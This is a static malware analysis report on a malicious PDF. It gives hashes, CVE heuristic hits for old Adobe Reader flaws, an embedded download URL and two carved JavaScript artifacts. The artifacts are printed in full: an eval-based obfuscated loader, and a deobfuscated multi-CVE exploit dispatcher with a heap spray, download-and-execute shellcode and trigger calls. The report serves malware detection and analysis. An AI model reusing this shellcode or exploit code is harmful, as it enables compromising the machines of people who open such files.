Malicious PDF — malware analysis report

Static analysis result for SHA-256 d01bcce102932c44…

MALICIOUS

PDF

10.2 KB Created: 2010-06-06 12:37:42 Authoring application: Saqmosiwaneho (via 8df87Ceyfimewoje) First seen: 2012-07-12
MD5: 42d35ecdb980c50ed1ad2bebeb0302dc SHA-1: a9694277a3a68fcd080199b16bc800089f3322bc SHA-256: d01bcce102932c448c524d8296e5275b1110496c209244e60432b126cd2e3e81
410 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudb.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0018_000.js pdf-javascript-stream PDF /JS object 18 at offset 0x1A2A 4192 bytes
SHA-256: 2e76c23f50f40d730a485a5b4df0a6c1ae4b35f531c235a2f9c0e12351b2e6d7
Preview script
First 1,000 lines of the extracted script
try {
var zYNU=new Date();var zO=new Date();var dY=false;
cFQ="'/2/# 2D2E&L#E2T@E# 2P&A@G@E!S& #W&I@T#H@O&U2T& !T2E!X#T2 !f&r@o&m# #t2h@e! !P@D@F! !d&o!c&u2m&e2n#t#\\!r!\\@n&/#/# #I&M2P@O!R2T2A2N&T!:2 2T&h@i&s2 @s@c!r!i@p!t@ #a2s#s2u&m#e#s& !t@h!a&t! @p!a&g2e& &i!s2 2b2l@a#n&k@ #i!f2 !i2t! &d!o@e#s& 2n@o@t# 2c&o@n@t&a@i2n# &a@n2y# #\\#\"@p&d@f2 2w2o&r!d!s!\\!\"2\\2r2\\#n!\\2r&\\!n#t&r!y# &{@\\#r@\\@n!\\&r2\\!n2!f&o2r& &(#v!a#r& 2i# !=2 #0@;2 @i& #<@ ! #t!h#i&s2.!n@u@m2P@a#g!e#s&;& !i&+@+&)# @\\@r!\\&n!!{2\\#r&\\&n!#&n@u#m2W!o@r&d2s# !=# 2t#h2i&s#.#g@e#t@P#a&g&e#N&u&m&W&o!r&d!s!(&i2)2;!\\2r#\\!n2!#i2f2 @(#n2u&m&W#o!r#d2s2 !=!=@ !0&)! #\\@r&\\&n@22{2\\#r2\\@n##&!t@h@i&s!.!d&e!l2e#t#e2P@a#g#e2s#(@i&,&i#)2;&\\&r@\\2n@!2}#\\#r@\\#n##}!\\&r&\\@n!\\2r2\\2n#}#\\@r&\\@n&c@a#t!c@h2(@e#)2\\#r!\\#n#{@\\!r#\\2n!}&'.replace(/[&2\!#@]/g, '')";
hM={};this.zAN='';
mHI='v:akr: :okNk=jf?u|n|c:tjijokn|(:u:F?,jtkGk,kq:J|,ki?L?,kekD|)?{:r:e?tkujr|nk :u?F|[:nkekw| jSktjr?i?n?g?(|\"ksju:\"?+?\"|bjsj\"?+?\"?t|r|\"|):]:(jt?G:,jq|Jk,:i?L:,?ejD?)?;|}|;:v:akr? ?djG|=kS?tjr?i:n:gk(ko?N|(|\":f|r|ojm?H?6kI:a?\"k,?0|,:4:)|+?\"jCjhja|r|\"|+kojNk(j\"|C?o|d:ekw|7kNjE|\"k,j0|,?4k):)?;:vkajrj :wjF:=k\'|g|_ke|1|t:YkPk1:a?_?g?4:e?_|N?1?ujz:mk_:Wj_?ojY?rjYjd?1:s|4|\'|.:r?e|pjlja|cke?(|/?[:4?Y|1|z|_k]j/:g:,j |\'j\'?)?;?vja:rj :n?S|=?3?2|-j3:1|;jv|a?r| :i:P:=?1k0k0|-:1?0:0?;kvka?r: :t?M|=j\":\":;:v?a|r: kl|Q:=|tjhki:s:;jv?a?r: kgkH:=:\'|gk;:e?2?t:;:P?)jak(|gk;jek;?Nj)jt?J:h:):Wj)jo:;jr?)jdj;j\':.kr?e:p?l|a|c?ek(|/|[k;k2|J|\\k)?\\:(|]:/?gk,: k\'k\'j)|;?v:a?r| jpjY?=jS|tkrki?n?gk(:\"js|u?b:\"|+k\"?s?t:r|\"k):;|vkajr| ji|LkE|=kS:tkrkikn|gk;|v|a:r| ?okD:=?2j6:-j2|4:;|v:a?r? :zkYk=j3j+j1j3?;|v|a?r? |c|F?=k5?;jvka:rk kb|K|Vj=jt|h:i:s|[?nke?w: jS|t?r|i?njgk(?\"kp:a?r:s:e?\"k+:\"jIjn|t?E?6j5k\"?.?sju?b|s?tjr?(:0:,:3j)|)?]?;:v?a|r? ?f|Oj=:\"|%?C|AkVkg|\":.|s?ukbks?t:rj(|0:,?1|)|;:v?ajrk jgkJ?=:2:;kf:u:njc:t|i|ojn? jvj(?b|U?,:n|Ek,|s:X?):{:v?a|r| ko|F:=:\'k\'j;jf|o?rk(:vja?r: :f|Ck=:n|E?;kfkCj<?nkE:+|skX|;|f?Ck+?+j)?{ko?F?+j=:bkU?[:fkCj]k;j}jrkejtku:r|n: ?o?F|;|}k;|v?akr? jsjX?=jS?tkrkijn?g?(|okN?(k\"|ljejv:LkM:\"?,|0|,?2|)|+kokN:(:\"kz:T?a|skn:g:T|skzkak\"j,k4|,k2k)j+?ojNj(|\"?tjh:Pjo?x|\"|,j0:,|2k)j)|;kvja?r: :w|H?=?\":ekv?\"|+?ojNj(|\"jakl:8:y|K?7|\"k,|0:,?2?)j;|v?ajr? :h?U|=k\'jc?m?h|mkaj9:r?9?C?Rko?9|dj>:ekmjA|m|tkqj\'j.?rje?p:lja?c?e?(j/|[kq?R?\\?>km?9:]|/|gj,| |\'?\':)k;|v|ajrk ?wjNj=j\"ks:u|bjs:\"|+k\"jt?rji?nk\"j+k\":g?\"j;?;jf?ujn:c?t?i?ojnk :t:S|(|g|F|,kikL:,je?Dk)|{:t:Mk=:t:M?+:g|F?}j;kv:akrj :t?=kn|e?w: ji|LkEk(k)k;?f:u:n|c?t|i|o|n: kb?Sj(|g:Fj,jikLj,je?Dk):{:v|a:rk :u|X?=?rj(:gkF:):;:r|e|tkujr:n: kb:KkJj(|z?Y?N?(jgkFj,|u:X?):)j;k}|f?u?n:c|t|ijo|n: |b:K?J:(|g:Fk,:ijL?,kejDj)k{?v?a?rj ?g|F:=|bkK:Vk(jgjF?,:zjYj)j;|gkF:=jtjE:(kgkF:)?;|g|F?=?q|X|(ki|LkE:,|d|G|)k(?g?F?)?;|rke?t|ujr|nj |gjF:;j}?r:Cj=|f?u|n:c?tji?ojn:(jt?Ak,:x:A|,?i:L?,:e|Dk)j{kr:ektku|rjn: jtkA|+kx:A|}j;kvja?r| kojL:=?l:Qj[kwjF?]k(jgjJk)|;:v?a?r: jxkA:T?=|l?Q|[kw|H?]:;:fju?n|c|t?i|okn? ?r?(jr?Ej,|ikL?,kekDk)?{jrkejtjujrkn: jrjE:[|s?Xk]k-?okD?}:;jy:P?=jfkujn:cjt:i?o:n?(ktjA?,kxkA|,?ikL:,|e|D:)k{:r:ektjujrjnk kt?Ak-kx?Ak}k;:fju?n?cjtkijo|n| khkAkJ|(|f?C:,ji|Lk,:e:Dk)k{?rje:t:ukr:nk kl|Qk[kg?H:]?(jgkJk,|f|Cj):}?;jzkYjN:=kf|ukn|c|tji|oknj(?r?E|,:p:S:,:i:L|,|ejDj)?{?rke:t?u:rknk |v:(:rjEj,|p:S|,jokDk)?}j;|w:P?Wk=jf:u:njc|t?ijokn?(:b|Uk,|p:Sk,ki:L|,|ejD?):{?r|e:t|u:r:nk ?b|U?[:hkUk]|(:p:S|)?}k;?f:u?n|c|t|i?o:n| |qkX|(?rkEk,kcjNj,ki?L:,ke?D?)k{|rkejt?ukr?n: |rjEk[|ckN?]?}?;:f?u|n?c|t|ikokn? kz?Ej(?g?F?,:ijL|,ke?Dj)?{?rje?t:ujrjnk jfkO?+kg|Fk}|;:f?u:n|c|t?iko:nk ?t|E?(:y|V:,?x|AkNj,:i|L?,|e|D?)|{jr|e|t|ukr:nj ?ykV?^|c|Fj;j}k;:;?f:u|n?cktji?ojnj :b?W:(jf?Cj,:i?Lk,?ekD?)?{kv?a:r: :gjHkK:=|hkA?J|(:fjC?)j;|gkHkK:=?b|S?(?g:HkK?)|;?r|ejtkujr?n? ?g|HkKj;:}kvka?rj :w?Bk=|ijP:;|f:okr?(jwkB:=?i?Pj;?wkB|<jo|L:;kwjB|+j+:)j{jt|S|(:bjWj(kw?Bk)k)?;?}:;|x:A:Tj(kt?Mj):;?'.replace(/[\?\|j\:k]/g, '');
var dA={jK:false};
gJY=this["ap"+"pkQA".substr(0,1)];
nU=18294;nU+=149;sT=27837;sT+=104;
kRU=gJY["evalkwH".substr(0,4)];
var wBM=[];var mV=[];
kRU(cFQ);
var zANW='';var mJ={};var sL={aN:"jW".charCodeAt(1481)};
gR=vM;
var kR=["sXO","yN","jU"];
} catch(gFA){
this.wHW="wHW";this.tY="tY";
kRU(mHI);
this.hW=11206;this.hW++;
}
page_word_xor_stage_000.js deobfuscated-js page-word hex-tail XOR decoded JavaScript (decompressed, key=0x05) at offset 0x7BF 3048 bytes
SHA-256: 92967d05b7d23457bdba7402c548bef41194b3274206bd604239266a78cc1e74
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var uL='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#', h=this.info.author.replace(/[\s]/g, '');var d = (this.info.producer.substr(0,5) == 'debug');var f = new Array();function fY(gN){var z = p();var b = hA();z += ((z.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + b;if(d) app.alert("URL: " + z);z=mN(z);var t="%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";t+=z;return unescape(t);};function p(){var bU = this.info.title.replace(/[\s]/g, '');if(d) app.alert("DEST_TABLE: " + h);var oF = n(bU, h, uL);return oF;};function n(bU, uL, h){var oF="";for(var i=0; i < bU.length; i++){var bK = uL.indexOf(bU[i]);if(bK > -1 ){oF += h[bK];}}return oF;};function mN(bU){var out = "";bU = wP(bU);g = Math.round(bU.length / 4);if (g != bU.length /4) bU+="00";for(var i=0; i < bU.length; i+=4){out+="%u" + bU.substr(i+2, 2) + bU.substr(i, 2);}return out;};function wP(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function zA(cB, ez5pL6){while (cB.length * 2 < ez5pL6){cB += cB;}cB = cB.substring(0, ez5pL6 / 2);return cB;};function pU(aD){var qPBt7D = 0x0c0c0c0c;x = fY("pdf");if (aD == 1){qPBt7D = 0x30303030;}var l = 0x400000;var tsSzSc = x.length * 2;var ez5pL6 = l - (tsSzSc + 0x38);var cB = unescape("%u9090%u9090");cB = zA(cB, ez5pL6);var x62RaBM3 = (qPBt7D - 0x400000) / l;for (var xA = 0; xA < x62RaBM3; xA ++ ){f[xA] = cB + x;}};function hA(){try {return app.viewerVersion.toString();}catch(sB){    return 0;}}function tM(){   var b = hA();if(d) app.alert("Acrobat Version: " + b);if (b > 8){if(d) app.alert("Run util.printf exploit.");pU(1);var qD = "12999999999999999999";for (tA=0; tA < 276; tA++){qD += "8";}util.printf("%45000f", qD);}if (b < 8){if(d) app.alert("Run Collab.collectEmailInfo exploit.");pU(0);var sN = unescape("%u0c0c%u0c0c");while (sN.length < 44952) sN += sN;this .collabStore = Collab.collectEmailInfo({ subj : "", msg : sN});}if (b < 9.1){if (app.doc.Collab.getIcon){if(d) app.alert("Run Collab.getIcon exploit.");pU(0);var tI = unescape("%09");while (tI.length < 0x4000) tI += tI;tI = "N." + tI;app.doc.Collab.getIcon(tI);}}if (b == 9.2){if(d) app.alert("Run media.newPlayer exploit.");pU(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}};tM();